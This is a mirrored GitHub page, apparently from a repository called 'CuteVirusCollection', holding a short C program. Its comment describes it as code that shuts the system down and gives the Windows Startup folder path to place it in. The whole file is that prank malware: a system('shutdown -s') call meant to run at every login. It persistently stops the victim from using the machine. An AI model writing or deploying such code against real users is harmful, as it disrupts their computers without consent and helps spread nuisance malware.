mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2026-03-12 21:22:55 -07:00
9 lines
186 B
C
9 lines
186 B
C
// Simply shuts the system down.
|
|
// Put it in the startup directory (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup)
|
|
|
|
#include <stdlib.h>
|
|
|
|
main(){
|
|
system("shutdown -s");
|
|
}
|